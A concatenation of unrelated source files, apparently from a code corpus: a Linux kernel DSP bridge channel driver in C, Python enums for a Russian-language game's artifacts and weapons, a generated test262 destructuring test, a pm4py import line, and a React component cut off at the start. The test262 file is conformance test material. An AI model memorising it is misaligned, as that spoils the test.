*chnl_mgr_obj = hchnl_mgr; u32 chnl_id; if (hchnl_mgr) { /* Close all open channels: */ for (chnl_id = 0; chnl_id < chnl_mgr_obj->max_channels; chnl_id++) { status = bridge_chnl_close(chnl_mgr_obj->ap_channel [chnl_id]); if (status) dev_dbg(bridge, "%s: Error status 0x%x\n", __func__, status); } /* Free channel manager object: */ kfree(chnl_mgr_obj->ap_channel); /* Set hchnl_mgr to NULL in device object. */ dev_set_chnl_mgr(chnl_mgr_obj->hdev_obj, NULL); /* Free this Chnl Mgr object: */ kfree(hchnl_mgr); } else { status = -EFAULT; } return status; } /* * ======== bridge_chnl_flush_io ======== * purpose: * Flushes all the outstanding data requests on a channel. */ int bridge_chnl_flush_io(struct chnl_object *chnl_obj, u32 timeout) { int status = 0; struct chnl_object *pchnl = (struct chnl_object *)chnl_obj; s8 chnl_mode = -1; struct chnl_mgr *chnl_mgr_obj; struct chnl_ioc chnl_ioc_obj; /* Check args: */ if (pchnl) { if ((timeout == CHNL_IOCNOWAIT) && CHNL_IS_OUTPUT(pchnl->chnl_mode)) { status = -EINVAL; } else { chnl_mode = pchnl->chnl_mode; chnl_mgr_obj = pchnl->chnl_mgr_obj; } } else { status = -EFAULT; } if (!status) { /* Note: Currently, if another thread continues to add IO * requests to this channel, this function will continue to * flush all such queued IO requests. */ if (CHNL_IS_OUTPUT(chnl_mode) && (pchnl->chnl_type == CHNL_PCPY)) { /* Wait for IO completions, up to the specified * timeout: */ while (!LST_IS_EMPTY(pchnl->pio_requests) && !status) { status = bridge_chnl_get_ioc(chnl_obj, timeout, &chnl_ioc_obj); if (status) continue; if (chnl_ioc_obj.status & CHNL_IOCSTATTIMEOUT) status = -ETIMEDOUT; } } else { status = bridge_chnl_cancel_io(chnl_obj); /* Now, leave the channel in the ready state: */ pchnl->dw_state &= ~CHNL_STATECANCEL; } } DBC_ENSURE(status || LST_IS_EMPTY(pchnl->pio_requests)); return status; } /* * ======== bridge_chnl_get_info ======== * Purpose: * Retrieve information related to a channel. */ int bridge_chnl_get_info(struct chnl_object *chnl_obj, struct chnl_info *channel_info) { int status = 0; struct chnl_object *pchnl = (struct chnl_object *)chnl_obj; if (channel_info != NULL) { if (pchnl) { /* Return the requested information: */ channel_info->hchnl_mgr = pchnl->chnl_mgr_obj; channel_info->event_obj = pchnl->user_event; channel_info->cnhl_id = pchnl->chnl_id; channel_info->dw_mode = pchnl->chnl_mode; channel_info->bytes_tx = pchnl->bytes_moved; channel_info->process = pchnl->process; channel_info->sync_event = pchnl->sync_event; channel_info->cio_cs = pchnl->cio_cs; channel_info->cio_reqs = pchnl->cio_reqs; channel_info->dw_state = pchnl->dw_state; } else { status = -EFAULT; } } else { status = -EFAULT; } return status; } /* * ======== bridge_chnl_get_ioc ======== * Optionally wait for I/O completion on a channel. Dequeue an I/O * completion record, which contains information about the completed * I/O request. * Note: Ensures Channel Invariant (see notes above). */ int bridge_chnl_get_ioc(struct chnl_object *chnl_obj, u32 timeout, struct chnl_ioc *chan_ioc) { int status = 0; struct chnl_object *pchnl = (struct chnl_object *)chnl_obj; struct chnl_irp *chnl_packet_obj; int stat_sync; bool dequeue_ioc = true; struct chnl_ioc ioc = { NULL, 0, 0, 0, 0 }; u8 *host_sys_buf = NULL; struct bridge_dev_context *dev_ctxt; struct dev_object *dev_obj; /* Check args: */ if (!chan_ioc || !pchnl) { status = -EFAULT; } else if (timeout == CHNL_IOCNOWAIT) { if (LST_IS_EMPTY(pchnl->pio_completions)) status = -EREMOTEIO; } dev_obj = dev_get_first(); dev_get_bridge_context(dev_obj, &dev_ctxt); if (!dev_ctxt) status = -EFAULT; if (status) goto func_end; ioc.status = CHNL_IOCSTATCOMPLETE; if (timeout != CHNL_IOCNOWAIT && LST_IS_EMPTY(pchnl->pio_completions)) { if (timeout == CHNL_IOCINFINITE) timeout = SYNC_INFINITE; stat_sync = sync_wait_on_event(pchnl->sync_event, timeout); if (stat_sync == -ETIME) { /* No response from DSP */ ioc.status |= CHNL_IOCSTATTIMEOUT; dequeue_ioc = false; } else if (stat_sync == -EPERM) { /* This can occur when the user mode thread is * aborted (^C), or when _VWIN32_WaitSingleObject() * fails due to unkown causes. */ /* Even though Wait failed, there may be something in * the Q: */ if (LST_IS_EMPTY(pchnl->pio_completions)) { ioc.status |= CHNL_IOCSTATCANCEL; dequeue_ioc = false; } } } /* See comment in AddIOReq */ spin_lock_bh(&pchnl->chnl_mgr_obj->chnl_mgr_lock); omap_mbox_disable_irq(dev_ctxt->mbox, IRQ_RX); if (dequeue_ioc) { /* Dequeue IOC and set chan_ioc; */ DBC_ASSERT(!LST_IS_EMPTY(pchnl->pio_completions)); chnl_packet_obj = (struct chnl_irp *)lst_get_head(pchnl->pio_completions); /* Update chan_ioc from channel state and chirp: */ if (chnl_packet_obj) { pchnl->cio_cs--; /* If this is a zero-copy channel, then set IOC's pbuf * to the DSP's address. This DSP address will get * translated to user's virtual addr later. */ { host_sys_buf = chnl_packet_obj->host_sys_buf; ioc.pbuf = chnl_packet_obj->host_user_buf; } ioc.byte_size = chnl_packet_obj->byte_size; ioc.buf_size = chnl_packet_obj->buf_size; ioc.dw_arg = chnl_packet_obj->dw_arg; ioc.status |= chnl_packet_obj->status; /* Place the used chirp on the free list: */ lst_put_tail(pchnl->free_packets_list, (struct list_head *)chnl_packet_obj); } else { ioc.pbuf = NULL; ioc.byte_size = 0; } } else { ioc.pbuf = NULL; ioc.byte_size = 0; ioc.dw_arg = 0; ioc.buf_size = 0; } /* Ensure invariant: If any IOC's are queued for this channel... */ if (!LST_IS_EMPTY(pchnl->pio_completions)) { /* Since DSPStream_Reclaim() does not take a timeout * parameter, we pass the stream's timeout value to * bridge_chnl_get_ioc. We cannot determine whether or not * we have waited in User mode. Since the stream's timeout * value may be non-zero, we still have to set the event. * Therefore, this optimization is taken out. * * if (timeout == CHNL_IOCNOWAIT) { * ... ensure event is set.. * sync_set_event(pchnl->sync_event); * } */ sync_set_event(pchnl->sync_event); } else { /* else, if list is empty, ensure event is reset. */ sync_reset_event(pchnl->sync_event); } omap_mbox_enable_irq(dev_ctxt->mbox, IRQ_RX); spin_unlock_bh(&pchnl->chnl_mgr_obj->chnl_mgr_lock); if (dequeue_ioc && (pchnl->chnl_type == CHNL_PCPY && pchnl->chnl_id > 1)) { if (!(ioc.pbuf < (void *)USERMODE_ADDR)) goto func_cont; /* If the addr is in user mode, then copy it */ if (!host_sys_buf || !ioc.pbuf) { status = -EFAULT; goto func_cont; } if (!CHNL_IS_INPUT(pchnl->chnl_mode)) goto func_cont1; /*host_user_buf */ status = copy_to_user(ioc.pbuf, host_sys_buf, ioc.byte_size); if (status) { if (current->flags & PF_EXITING) status = 0; } if (status) status = -EFAULT; func_cont1: kfree(host_sys_buf); } func_cont: /* Update User's IOC block: */ *chan_ioc = ioc; func_end: return status; } /* * ======== bridge_chnl_get_mgr_info ======== * Retrieve information related to the channel manager. */ int bridge_chnl_get_mgr_info(struct chnl_mgr *hchnl_mgr, u32 ch_id, struct chnl_mgrinfo *mgr_info) { int status = 0; struct chnl_mgr *chnl_mgr_obj = (struct chnl_mgr *)hchnl_mgr; if (mgr_info != NULL) { if (ch_id <= CHNL_MAXCHANNELS) { if (hchnl_mgr) { /* Return the requested information: */ mgr_info->chnl_obj = chnl_mgr_obj->ap_channel[ch_id]; mgr_info->open_channels = chnl_mgr_obj->open_channels; mgr_info->dw_type = chnl_mgr_obj->dw_type; /* total # of chnls */ mgr_info->max_channels = chnl_mgr_obj->max_channels; } else { status = -EFAULT; } } else { status = -ECHRNG; } } else { status = -EFAULT; } return status; } /* * ======== bridge_chnl_idle ======== * Idles a particular channel. */ int bridge_chnl_idle(struct chnl_object *chnl_obj, u32 timeout, bool flush_data) { s8 chnl_mode; struct chnl_mgr *chnl_mgr_obj; int status = 0; DBC_REQUIRE(chnl_obj); chnl_mode = chnl_obj->chnl_mode; chnl_mgr_obj = chnl_obj->chnl_mgr_obj; if (CHNL_IS_OUTPUT(chnl_mode) && !flush_data) { /* Wait for IO completions, up to the specified timeout: */ status = bridge_chnl_flush_io(chnl_obj, timeout); } else { status = bridge_chnl_cancel_io(chnl_obj); /* Reset the byte count and put channel back in ready state. */ chnl_obj->bytes_moved = 0; chnl_obj->dw_state &= ~CHNL_STATECANCEL; } return status; } /* * ======== bridge_chnl_open ======== * Open a new half-duplex channel to the DSP board. */ int bridge_chnl_open(struct chnl_object **chnl, struct chnl_mgr *hchnl_mgr, s8 chnl_mode, u32 ch_id, const struct chnl_attr *pattrs) { int status = 0; struct chnl_mgr *chnl_mgr_obj = hchnl_mgr; struct chnl_object *pchnl = NULL; struct sync_object *sync_event = NULL; /* Ensure DBC requirements: */ DBC_REQUIRE(chnl != NULL); DBC_REQUIRE(pattrs != NULL); DBC_REQUIRE(hchnl_mgr != NULL); *chnl = NULL; /* Validate Args: */ if (pattrs->uio_reqs == 0) { status = -EINVAL; } else { if (!hchnl_mgr) { status = -EFAULT; } else { if (ch_id != CHNL_PICKFREE) { if (ch_id >= chnl_mgr_obj->max_channels) status = -ECHRNG; else if (chnl_mgr_obj->ap_channel[ch_id] != NULL) status = -EALREADY; } else { /* Check for free channel */ status = search_free_channel(chnl_mgr_obj, &ch_id); } } } if (status) goto func_end; DBC_ASSERT(ch_id < chnl_mgr_obj->max_channels); /* Create channel object: */ pchnl = kzalloc(sizeof(struct chnl_object), GFP_KERNEL); if (!pchnl) { status = -ENOMEM; goto func_end; } /* Protect queues from io_dpc: */ pchnl->dw_state = CHNL_STATECANCEL; /* Allocate initial IOR and IOC queues: */ pchnl->free_packets_list = create_chirp_list(pattrs->uio_reqs); pchnl->pio_requests = create_chirp_list(0); pchnl->pio_completions = create_chirp_list(0); pchnl->chnl_packets = pattrs->uio_reqs; pchnl->cio_cs = 0; pchnl->cio_reqs = 0; sync_event = kzalloc(sizeof(struct sync_object), GFP_KERNEL); if (sync_event) sync_init_event(sync_event); else status = -ENOMEM; if (!status) { pchnl->ntfy_obj = kmalloc(sizeof(struct ntfy_object), GFP_KERNEL); if (pchnl->ntfy_obj) ntfy_init(pchnl->ntfy_obj); else status = -ENOMEM; } if (!status) { if (pchnl->pio_completions && pchnl->pio_requests && pchnl->free_packets_list) { /* Initialize CHNL object fields: */ pchnl->chnl_mgr_obj = chnl_mgr_obj; pchnl->chnl_id = ch_id; pchnl->chnl_mode = chnl_mode; pchnl->user_event = sync_event; pchnl->sync_event = sync_event; /* Get the process handle */ pchnl->process = current->tgid; pchnl->pcb_arg = 0; pchnl->bytes_moved = 0; /* Default to proc-copy */ pchnl->chnl_type = CHNL_PCPY; } else { status = -ENOMEM; } } if (status) { /* Free memory */ if (pchnl->pio_completions) { free_chirp_list(pchnl->pio_completions); pchnl->pio_completions = NULL; pchnl->cio_cs = 0; } if (pchnl->pio_requests) { free_chirp_list(pchnl->pio_requests); pchnl->pio_requests = NULL; } if (pchnl->free_packets_list) { free_chirp_list(pchnl->free_packets_list); pchnl->free_packets_list = NULL; } kfree(sync_event); sync_event = NULL; if (pchnl->ntfy_obj) { ntfy_delete(pchnl->ntfy_obj); kfree(pchnl->ntfy_obj); pchnl->ntfy_obj = NULL; } kfree(pchnl); } else { /* Insert channel object in channel manager: */ chnl_mgr_obj->ap_channel[pchnl->chnl_id] = pchnl; spin_lock_bh(&chnl_mgr_obj->chnl_mgr_lock); chnl_mgr_obj->open_channels++; spin_unlock_bh(&chnl_mgr_obj->chnl_mgr_lock); /* Return result... */ pchnl->dw_state = CHNL_STATEREADY; *chnl = pchnl; } func_end: DBC_ENSURE((!status && pchnl) || (*chnl == NULL)); return status; } /* * ======== bridge_chnl_register_notify ======== * Registers for events on a particular channel. */ int bridge_chnl_register_notify(struct chnl_object *chnl_obj, u32 event_mask, u32 notify_type, struct dsp_notification *hnotification) { int status = 0; DBC_ASSERT(!(event_mask & ~(DSP_STREAMDONE | DSP_STREAMIOCOMPLETION))); if (event_mask) status = ntfy_register(chnl_obj->ntfy_obj, hnotification, event_mask, notify_type); else status = ntfy_unregister(chnl_obj->ntfy_obj, hnotification); return status; } /* * ======== create_chirp_list ======== * Purpose: * Initialize a queue of channel I/O Request/Completion packets. * Parameters: * chirps: Number of Chirps to allocate. * Returns: * Pointer to queue of IRPs, or NULL. * Requires: * Ensures: */ static struct lst_list *create_chirp_list(u32 chirps) { struct lst_list *chirp_list; struct chnl_irp *chnl_packet_obj; u32 i; chirp_list = kzalloc(sizeof(struct lst_list), GFP_KERNEL); if (chirp_list) { INIT_LIST_HEAD(&chirp_list->head); /* Make N chirps and place on queue. */ for (i = 0; (i < chirps) && ((chnl_packet_obj = make_new_chirp()) != NULL); i++) { lst_put_tail(chirp_list, (struct list_head *)chnl_packet_obj); } /* If we couldn't allocate all chirps, free those allocated: */ if (i != chirps) { free_chirp_list(chirp_list); chirp_list = NULL; } } return chirp_list; } /* * ======== free_chirp_list ======== * Purpose: * Free the queue of Chirps. */ static void free_chirp_list(struct lst_list *chirp_list) { DBC_REQUIRE(chirp_list != NULL); while (!LST_IS_EMPTY(chirp_list)) kfree(lst_get_head(chirp_list)); kfree(chirp_list); } /* * ======== make_new_chirp ======== * Allocate the memory for a new channel IRP. */ static struct chnl_irp *make_new_chirp(void) { struct chnl_irp *chnl_packet_obj; chnl_packet_obj = kzalloc(sizeof(struct chnl_irp), GFP_KERNEL); if (chnl_packet_obj != NULL) { /* lst_init_elem only resets the list's member values. */ lst_init_elem(&chnl_packet_obj->link); } return chnl_packet_obj; } /* * ======== search_free_channel ======== * Search for a free channel slot in the array of channel pointers. */ static int search_free_channel(struct chnl_mgr *chnl_mgr_obj, u32 *chnl) { int status = -ENOSR; u32 i; DBC_REQUIRE(chnl_mgr_obj); for (i = 0; i < chnl_mgr_obj->max_channels; i++) { if (chnl_mgr_obj->ap_channel[i] == NULL) { status = 0; *chnl = i; break; } } return status; }
{ "pile_set_name": "Github" }
import smart_imports smart_imports.all() class INDEX_ORDER_TYPE(rels_django.DjangoEnum): records = (('BY_LEVEL', 'by_level', 'по уровню'), ('BY_NAME', 'by_name', 'по имени')) class ARTIFACT_TYPE(rels_django.DjangoEnum): records = (('USELESS', 0, 'хлам'), ('MAIN_HAND', 1, 'основная рука'), ('OFF_HAND', 2, 'вторая рука'), ('PLATE', 3, 'доспех'), ('AMULET', 4, 'амулет'), ('HELMET', 5, 'шлем'), ('CLOAK', 6, 'плащ'), ('SHOULDERS', 7, 'наплечники'), ('GLOVES', 8, 'перчатки'), ('PANTS', 9, 'штаны'), ('BOOTS', 10, 'обувь'), ('RING', 11, 'кольцо')) class ARTIFACT_POWER_TYPE(rels_django.DjangoEnum): distribution = rels.Column() records = (('MOST_MAGICAL', 0, 'магическая', power.PowerDistribution(0.1, 0.9)), ('MAGICAL', 1, 'ближе к магии', power.PowerDistribution(0.25, 0.75)), ('NEUTRAL', 2, 'равновесие', power.PowerDistribution(0.5, 0.5)), ('PHYSICAL', 3, 'ближе к физике', power.PowerDistribution(0.75, 0.25)), ('MOST_PHYSICAL', 4, 'физическая', power.PowerDistribution(0.9, 0.1))) class ARTIFACT_RECORD_STATE(rels_django.DjangoEnum): records = (('ENABLED', 0, 'в игре'), ('DISABLED', 1, 'вне игры')) class RARITY(rels_django.DjangoEnum): probability = rels.Column() max_integrity = rels.Column() preference_rating = rels.Column() cost = rels.Column() records = (('NORMAL', 0, 'обычный артефакт', c.NORMAL_ARTIFACT_PROBABILITY, c.ARTIFACT_MAX_INTEGRITY, 1.0, 1.0), ('RARE', 1, 'редкий артефакт', c.RARE_ARTIFACT_PROBABILITY, int(c.ARTIFACT_MAX_INTEGRITY * c.ARTIFACT_RARE_MAX_INTEGRITY_MULTIPLIER), 1.5, 3.0), ('EPIC', 2, 'эпический артефакт', c.EPIC_ARTIFACT_PROBABILITY, int(c.ARTIFACT_MAX_INTEGRITY * c.ARTIFACT_EPIC_MAX_INTEGRITY_MULTIPLIER), 2.0, 9.0)) class ARTIFACT_EFFECT(rels_django.DjangoEnum): records = (('PHYSICAL_DAMAGE', 0, 'мощь'), ('MAGICAL_DAMAGE', 1, 'колдовство'), ('INITIATIVE', 2, 'хорошая реакция'), ('HEALTH', 3, 'здоровье'), ('EXPERIENCE', 4, 'повышение интуиции'), ('POWER', 5, 'хитрость'), ('CONCENTRATION', 6, 'концентрация'), ('SPEED', 7, 'скороход'), ('BAG', 8, 'карманы'), ('NO_EFFECT', 666, 'нет эффекта'), ('GREAT_PHYSICAL_DAMAGE', 1000, 'небывалая мощь'), ('GREAT_MAGICAL_DAMAGE', 1001, 'могучее колдовство'), ('GREAT_INITIATIVE', 1002, 'превосходная реакция'), ('GREAT_HEALTH', 1003, 'невероятное здоровье'), ('GREAT_EXPERIENCE', 1004, 'сверхинтуиция'), ('GREAT_POWER', 1005, 'особая хитрость'), # ('GREAT_ENERGY', 1006, 'большой астральный сосуд'), ('GREAT_SPEED', 1007, 'неутомимый скороход'), ('GREAT_BAG', 1008, 'большие карманы'), ('REST_LENGTH', 1009, 'выносливость'), ('RESURRECT_LENGTH', 1010, 'живучесть'), ('IDLE_LENGTH', 1011, 'деятельность'), ('CONVICTION', 1012, 'убеждение'), ('CHARM', 1013, 'очарование'), # ('SPIRITUAL_CONNECTION', 1014, 'духовная связь'), ('PEACE_OF_MIND', 1015, 'душевное равновесие'), ('SPECIAL_AURA', 1016, 'особая аура'), ('REGENERATION', 1017, 'регенерация'), ('LAST_CHANCE', 1018, 'последний шанс'), ('ICE', 1019, 'лёд'), ('FLAME', 1020, 'пламя'), ('POISON', 1021, 'яд'), ('VAMPIRE_STRIKE', 1022, 'вампиризм'), ('ESPRIT', 1023, 'живость ума'), ('TERRIBLE_VIEW', 1024, 'ужасный вид'), ('CRITICAL_HIT', 1025, 'точные атаки'), ('ASTRAL_BARRIER', 1026, 'астральная преграда'), ('CLOUDED_MIND', 1027, 'затуманенный разум'), ('LUCK_OF_STRANGER', 1028, 'удача странника'), ('LUCK_OF_HERO', 1029, 'удача героя'), ('FORTITUDE', 1030, 'крепость духа'), ('IDEOLOGICAL', 1031, 'идейность'), ('UNBREAKABLE', 1032, 'нерушимость'), ('SPEEDUP', 1033, 'ускорение'), ('RECKLESSNESS', 1034, 'безрассудность'), ('CHILD_GIFT', 100001, 'детский подарок')) WEAPON_TYPE = tt_artifacts_relations.WEAPON_TYPE noun = lexicon_dictionary.noun # TODO: use real artifacts instead thar enum class STANDARD_WEAPON(rels_django.DjangoEnum): weapon_type = rels.Column(unique=False, no_index=True) utg_name = rels.Column(no_index=True) records = (('WEAPON_0', 0, 'булава', WEAPON_TYPE.TYPE_1, noun(['булава', 'булавы', 'булаве', 'булаву', 'булавой', 'булаве', 'булавы', 'булав', 'булавам', 'булавы', 'булавами', 'булавах'], 'но,жр')), ('WEAPON_1', 1, 'дубина', WEAPON_TYPE.TYPE_2, noun(['дубина', 'дубины', 'дубине', 'дубины', 'дубинами', 'дубинах', 'дубины', 'дубин', 'дубинам', 'дубины', 'дубинами', 'дубинах'], 'но,жр')), ('WEAPON_2', 2, 'жало на хвосте', WEAPON_TYPE.TYPE_29, noun(['жало', 'жала', 'жалу', 'жало', 'жалом', 'жале', 'жалы', 'жал', 'жалам', 'жалы', 'жалами', 'жалах'], 'но,жр')), ('WEAPON_3', 3, 'жвалы', WEAPON_TYPE.TYPE_14, noun(['', '', '', '', '', '', 'жвалы', 'жвал', 'жвалам', 'жвалы', 'жвалами', 'жвалах'], 'мн,но,жр')), ('WEAPON_4', 4, 'касание энергетическое', WEAPON_TYPE.TYPE_30, noun(['касание', 'касания', 'касанию', 'касание', 'касанием', 'касаниях', 'касания', 'касаний', 'касаниям', 'касания', 'касаниями', 'касаниях'], 'но,жр')), ('WEAPON_5', 5, 'катар', WEAPON_TYPE.TYPE_3, noun(['катар', 'катара', 'катару', 'катар', 'катаром', 'катаре', 'катары', 'катаров', 'катарам', 'катары', 'катарами', 'катарах'], 'но,мр')), ('WEAPON_6', 6, 'кинжал', WEAPON_TYPE.TYPE_4, noun(['кинжал', 'кинжала', 'кинжалу', 'кинжал', 'кинжалом', 'кинжале', 'кинжалы', 'кинжалов', 'кинжалам', 'кинжалы', 'кинжалами', 'кинжалах'], 'но,мр')), ('WEAPON_7', 7, 'кистень', WEAPON_TYPE.TYPE_5, noun(['кистень', 'кистеня', 'кистеню', 'кистень', 'кистенем', 'кистене', 'кистени', 'кистеней', 'кистеням', 'кистени', 'кистенями', 'кистенями'], 'но,мр')), ('WEAPON_8', 8, 'клешня', WEAPON_TYPE.TYPE_15, noun(['клешня', 'клешни', 'клешне', 'клешню', 'клешнёй', 'клешне', 'клешни', 'клешней', 'клешням', 'клешни', 'клешнями', 'клешнях'], 'но,жр')), ('WEAPON_9', 9, 'клыки', WEAPON_TYPE.TYPE_16, noun(['', '', '', '', '', '', 'клыки', 'клыков', 'клыкам', 'клаки', 'клыками', 'клыках'], 'мн,но,мр')), ('WEAPON_10', 10, 'клюв', WEAPON_TYPE.TYPE_17, noun(['клюв', 'клюва', 'клюву', 'клюв', 'клювом', 'клюве', 'клювы', 'клювов', 'клювам', 'клювы', 'клювами', 'клювах'], 'но,мр')), ('WEAPON_11', 11, 'когти', WEAPON_TYPE.TYPE_18, noun(['', '', '', '', '', '', 'когти', 'когтей', 'когтям', 'когти', 'когтями', 'когтях'], 'мн,но,мр')), ('WEAPON_12', 12, 'копьё', WEAPON_TYPE.TYPE_6, noun(['копьё', 'копья', 'копью', 'копьё', 'копьём', 'копье', 'копья', 'копий', 'копьям', 'копья', 'копьями', 'копьях'], 'но,ср')), ('WEAPON_13', 13, 'кулак', WEAPON_TYPE.TYPE_19, noun(['кулак', 'кулака', 'кулаку', 'кулак', 'кулаком', 'кулаке', 'кулаки', 'кулаков', 'кулакам', 'кулаки', 'кулаками', 'кулаках'], 'но,мр')), ('WEAPON_14', 14, 'меч', WEAPON_TYPE.TYPE_7, noun(['меч', 'меча', 'мечу', 'меч', 'мечом', 'мечу', 'мечи', 'мечей', 'мечам', 'мечи', 'мечами', 'мечах'], 'но,мр')), ('WEAPON_15', 15, 'нож', WEAPON_TYPE.TYPE_8, noun(['нож', 'ножа', 'ножу', 'нож', 'ножом', 'ноже', 'ножи', 'ножей', 'ножам', 'ножи', 'ножами', 'ножах'], 'но,мр')), ('WEAPON_16', 16, 'палка', WEAPON_TYPE.TYPE_20, noun(['палка', 'палки', 'палке', 'палку', 'палкой', 'палке', 'палки', 'палок', 'палкам', 'палки', 'палками', 'палках'], 'но,жр')), ('WEAPON_17', 17, 'пика', WEAPON_TYPE.TYPE_6, noun(['пика', 'пики', 'пике', 'пику', 'пикой', 'пике', 'пики', 'пик', 'пикам', 'пики', 'пиками', 'пиках'], 'но,жр')), ('WEAPON_18', 18, 'плеть', WEAPON_TYPE.TYPE_9, noun(['плеть', 'плети', 'плети', 'плеть', 'плетью', 'плетье', 'плети', 'плетей', 'плетям', 'плети', 'плетями', 'плетях'], 'но,жр')), ('WEAPON_19', 19, 'посох', WEAPON_TYPE.TYPE_10, noun(['посох', 'посоха', 'посоху', 'посох', 'посохом', 'посохе', 'посохи', 'посохов', 'посохам', 'посохи', 'посохами', 'посохах'], 'но,мр')), ('WEAPON_20', 20, 'рог', WEAPON_TYPE.TYPE_21, noun(['рог', 'рога', 'рогу', 'рог', 'рогом', 'роге', '', '', '', '', '', ''], 'ед,но,мр')), ('WEAPON_21', 21, 'рога', WEAPON_TYPE.TYPE_22, noun(['', '', '', '', '', '', 'рога', 'рогов', 'рогам', 'рога', 'рогами', 'рогах'], 'мн,но,мр')), ('WEAPON_22', 22, 'сабля', WEAPON_TYPE.TYPE_11, noun(['сабля', 'сабли', 'сабле', 'саблю', 'саблей', 'сабле', 'сабли', 'сабель', 'саблям', 'сабли', 'саблями', 'саблях'], 'но,жр')), ('WEAPON_23', 23, 'топор', WEAPON_TYPE.TYPE_12, noun(['топор', 'топора', 'топору', 'топор', 'топором', 'топаре', 'топоры', 'топоров', 'топорам', 'топоры', 'топорами', 'топорах'], 'но,мр')), ('WEAPON_24', 24, 'хопеш', WEAPON_TYPE.TYPE_23, noun(['хопеш', 'хопеша', 'хопешу', 'хопеш', 'хопешем', 'хопеше', 'хопеши', 'хопешей', 'хопешам', 'хопеши', 'хопешами', 'хопешах'], 'но,мр')), ('WEAPON_25', 25, 'шипы', WEAPON_TYPE.TYPE_24, noun(['', '', '', '', '', '', 'шипы', 'шипов', 'шипам', 'шипы', 'шипами', 'шипах'], 'мн,но,мр')), ('WEAPON_26', 26, 'хватательная лапа', WEAPON_TYPE.TYPE_31, noun(['лапа', 'лапы', 'лапе', 'лапу', 'лапой', 'лапе', 'лапы', 'лап', 'лапам', 'лапы', 'лапами', 'лапах'], 'но,жр')), ('WEAPON_27', 27, 'копыто', WEAPON_TYPE.TYPE_32, noun(['копыто', 'копыта', 'копыту', 'копыто', 'копытом', 'копыте', 'копыта', 'копыт', 'копытам', 'копыта', 'копытами', 'копытах'], 'но,ср')), ('WEAPON_28', 28, 'нога', WEAPON_TYPE.TYPE_33, noun(['нога', 'ноги', 'ноге', 'ногу', 'ногой', 'ноге', 'ноги', 'ног', 'ногам', 'ноги', 'ногами', 'ногах'], 'но,жр')), ('WEAPON_29', 29, 'серп', WEAPON_TYPE.TYPE_34, noun(['серп', 'серпа', 'серпу', 'серп', 'серпом', 'серпе', 'серпы', 'серпов', 'серпам', 'серпы', 'серпами', 'серпах'], 'но,мр')), ('WEAPON_30', 30, 'пила', WEAPON_TYPE.TYPE_26, noun(['пила', 'пилы', 'пиле', 'пилу', 'пилой', 'пиле', 'пилы', 'пил', 'пилам', 'пилы', 'пилами', 'пилах'], 'но,жр')), ('WEAPON_31', 31, 'праща', WEAPON_TYPE.TYPE_35, noun(['праща', 'пращи', 'праще', 'пращу', 'пращой', 'праще', 'пращи', 'пращей', 'пращам', 'пращи', 'пращами', 'пращах'], 'но,жр')), ('WEAPON_32', 32, 'лук', WEAPON_TYPE.TYPE_36, noun(['лук', 'лука', 'луку', 'лук', 'луком', 'луке', 'луки', 'луков', 'лукам', 'луки', 'луками', 'луках'], 'но,мр')), ('WEAPON_33', 33, 'арбалет', WEAPON_TYPE.TYPE_37, noun(['арбалет', 'арбалета', 'арбалету', 'арбалет', 'арбалетом', 'арбалете', 'арбалеты', 'арбалетов', 'арбалетам', 'арбалеты', 'арбалетами', 'арбалетах'], 'но,мр')), ('WEAPON_34', 34, 'молот', WEAPON_TYPE.TYPE_38, noun(['молот', 'молота', 'молоту', 'молот', 'молотом', 'молоте', 'молоты', 'молотов', 'молотам', 'молоты', 'молотами', 'молотах'], 'но,мр')), ('WEAPON_35', 35, 'шипастый хвост', WEAPON_TYPE.TYPE_39, noun(['хвост', 'хвоста', 'хвосту', 'хвост', 'хвостом', 'хвосте', 'хвосты', 'хвостов', 'хвостам', 'хвосты', 'хвостами', 'хвостах'], 'но,мр')))
{ "pile_set_name": "Github" }
// This file was procedurally generated from the following sources: // - src/dstr-binding-for-await/obj-ptrn-id-init-fn-name-fn.case // - src/dstr-binding-for-await/default/for-await-of-async-func-const-async.template /*--- description: SingleNameBinding assigns name to "anonymous" functions (for-await-of statement) esid: sec-for-in-and-for-of-statements-runtime-semantics-labelledevaluation features: [destructuring-binding, async-iteration] flags: [generated, async] info: | IterationStatement : for await ( ForDeclaration of AssignmentExpression ) Statement [...] 2. Return ? ForIn/OfBodyEvaluation(ForDeclaration, Statement, keyResult, lexicalBinding, labelSet, async). 13.7.5.13 Runtime Semantics: ForIn/OfBodyEvaluation [...] 4. Let destructuring be IsDestructuring of lhs. [...] 6. Repeat [...] j. If destructuring is false, then [...] k. Else i. If lhsKind is assignment, then [...] ii. Else if lhsKind is varBinding, then [...] iii. Else, 1. Assert: lhsKind is lexicalBinding. 2. Assert: lhs is a ForDeclaration. 3. Let status be the result of performing BindingInitialization for lhs passing nextValue and iterationEnv as arguments. [...] 13.3.3.7 Runtime Semantics: KeyedBindingInitialization SingleNameBinding : BindingIdentifier Initializer_opt [...] 6. If Initializer is present and v is undefined, then [...] d. If IsAnonymousFunctionDefinition(Initializer) is true, then i. Let hasNameProperty be HasOwnProperty(v, "name"). ii. ReturnIfAbrupt(hasNameProperty). iii. If hasNameProperty is false, perform SetFunctionName(v, bindingId). ---*/ var iterCount = 0; var asyncIter = (async function*() { yield* [{}]; })(); async function fn() { for await (const { fn = function () {}, xFn = function x() {} } of asyncIter) { assert.sameValue(fn.name, 'fn'); assert.notSameValue(xFn.name, 'xFn'); iterCount += 1; } } fn() .then(() => assert.sameValue(iterCount, 1, 'iteration occurred as expected'), $DONE) .then($DONE, $DONE);
{ "pile_set_name": "Github" }
from pm4py.simulation import tree_generator, playout, montecarlo
{ "pile_set_name": "Github" }
// @flow import React, { Component } from 'react'; import { observer } from 'mobx-react'; import SVGInline from 'react-svg-inline'; import classnames from 'classnames'; import { get } from 'lodash'; import { defineMessages, intlShape, FormattedHTMLMessage } from 'react-intl'; import { Button } from 'react-polymorph/lib/components/Button'; import { Checkbox } from 'react-polymorph/lib/components/Checkbox'; import { CheckboxSkin } from 'react-polymorph/lib/skins/simple/CheckboxSkin'; import { Link } from 'react-polymorph/lib/components/Link'; import { LinkSkin } from 'react-polymorph/lib/skins/simple/LinkSkin'; import { ButtonSkin } from 'react-polymorph/lib/skins/simple/ButtonSkin'; import { ButtonSpinnerSkin } from 'react-polymorph/lib/skins/simple/ButtonSpinnerSkin'; import ReactMarkdown from 'react-markdown'; import News from '../../domains/News'; import styles from './AppUpdateOverlay.scss'; import DialogCloseButton from '../widgets/DialogCloseButton'; import ProgressBarLarge from '../widgets/ProgressBarLarge'; import externalLinkIcon from '../../assets/images/link-ic.inline.svg'; const messages = defineMessages({ title: { id: 